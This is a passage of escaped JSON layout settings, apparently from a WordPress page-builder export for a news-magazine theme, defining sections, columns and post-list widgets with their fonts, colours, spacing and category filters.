it\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"pzcs9rp\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"structure\":\"20\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"gifizg0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"65.004\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"in485g7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"sqh26zs\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"48.082\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"ni7iq5b\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"1\",\"category\":[\"8\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#385c7b\",\"post_list1_category_background_hov_color\":\"#385c7b\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true},{\"id\":\"feegelf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"51.918\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true},{\"id\":\"wnhjaaz\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"category\":[\"10\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#00c5b5\",\"post_list1_category_background_hov_color\":\"#00c5b5\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#00c5b5\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-5\",\"bottom\":\"0\",\"left\":\"-5\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"3j25kle\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"q18cnb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"o6ou2yp\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"offset\":\"1\",\"category\":[\"5\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"14\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight\":\"700\",\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"use_meta_post_list_1\":\"\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"use_excerpt_post_list_1\":\"\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"-15\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true},{\"id\":\"wg2jk1s\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"e37o4qh\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"